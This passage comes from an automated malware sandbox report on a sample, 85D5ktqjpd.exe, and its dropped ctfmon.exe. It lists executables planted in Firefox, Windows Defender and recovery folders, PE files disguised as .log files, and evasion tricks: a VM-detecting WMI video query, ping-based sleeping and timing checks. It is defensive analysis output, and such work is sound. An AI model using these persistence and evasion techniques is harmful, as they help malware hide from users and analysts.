                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C1D7C2F pushad ; retf 5_2_00007FFD9C1D7C5D
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C417672 push ecx; iretd 5_2_00007FFD9C417673
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C419355 push edx; ret 5_2_00007FFD9C41935B

                            Persistence and Installation Behavior

                            barindex
                            Drops executable to a common third party application directory
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile written: C:\Program Files\Mozilla Firefox\uninstall\upfc.exeJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\oPZxcDoy.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\XYySZcJy.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\NLuKuVnw.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\HFlvrDZi.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\Cbqwysdq.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\vdCwVejC.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\rIogOAZx.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\CpWmZfmQ.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\ZJdigpUr.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\cLPQBZYm.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\yOiNcrtu.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\eWmRCrDn.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\VOtkXUXl.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\LnsTTQzV.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\WLUssUmg.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\jAgQuBAe.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\AppData\Local\Microsoft\XWWZQvSvBozA.exeJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\RYCtQXXs.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\ZRNAKZux.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\yWRfHaUA.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\haIyjaMG.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Program Files\Mozilla Firefox\uninstall\upfc.exeJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\iMcIJnEg.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\LEzlimtY.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\tTxOTVxp.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\fKqanEzl.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\dzUZnmUk.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\lQyoqXNz.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\akEQlvtX.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\QitkawpP.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\WbWKDcuD.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\hyuiZSvj.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\TEXjXBsl.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\pHpfyUNt.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\jswyQSZZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\xJoFaSxi.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\WuNaeyse.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Recovery\ctfmon.exeJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\ICMDMDoc.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\cExRVzrV.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\JVDTnZnD.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\oYwxMpHv.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\ypIvhwSa.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\HpjdguSK.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\VWLjDtED.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\psJpXhFT.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\FfNcgcmK.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\kiFHFtHC.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\CJjejXjo.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\sdoGeuPL.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\zTtncajv.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\MdBcJrhy.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\FMWMFGoj.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\nbVprpsA.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\EzsmZyRR.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\gdhqOayL.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\uzSEaASh.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\xJoFaSxi.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\uzSEaASh.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\nbVprpsA.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\lQyoqXNz.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\VOtkXUXl.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\TEXjXBsl.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\JVDTnZnD.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\tTxOTVxp.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\haIyjaMG.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\RYCtQXXs.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\rIogOAZx.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\oPZxcDoy.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\akEQlvtX.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\ypIvhwSa.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\pHpfyUNt.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\gdhqOayL.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\WuNaeyse.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\NLuKuVnw.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\HpjdguSK.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\FfNcgcmK.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\oYwxMpHv.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\WLUssUmg.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\MdBcJrhy.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\EzsmZyRR.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\CpWmZfmQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\kiFHFtHC.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\cExRVzrV.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\hyuiZSvj.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\sdoGeuPL.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\jAgQuBAe.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\ZRNAKZux.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\QitkawpP.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\HFlvrDZi.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\yWRfHaUA.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\psJpXhFT.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\fKqanEzl.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\dzUZnmUk.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\WbWKDcuD.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\VWLjDtED.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\LnsTTQzV.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\CJjejXjo.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\jswyQSZZ.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\ZJdigpUr.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\ICMDMDoc.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\zTtncajv.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\yOiNcrtu.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\iMcIJnEg.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\XYySZcJy.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\FMWMFGoj.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\vdCwVejC.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\eWmRCrDn.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\cLPQBZYm.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\LEzlimtY.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeFile created: C:\Users\user\Desktop\Cbqwysdq.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Uses ping.exe to sleep
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeMemory allocated: 1950000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeMemory allocated: 1B430000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\ctfmon.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\ctfmon.exeMemory allocated: 1AF90000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BA63558 rdtsc 0_2_00007FFD9BA63558
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\oPZxcDoy.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\XYySZcJy.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\NLuKuVnw.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\HFlvrDZi.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\Cbqwysdq.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\vdCwVejC.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\rIogOAZx.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\CpWmZfmQ.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZJdigpUr.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\cLPQBZYm.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\eWmRCrDn.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\yOiNcrtu.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\LnsTTQzV.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\VOtkXUXl.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\WLUssUmg.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\jAgQuBAe.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\RYCtQXXs.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZRNAKZux.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\yWRfHaUA.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\haIyjaMG.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\LEzlimtY.logJump to dropped file
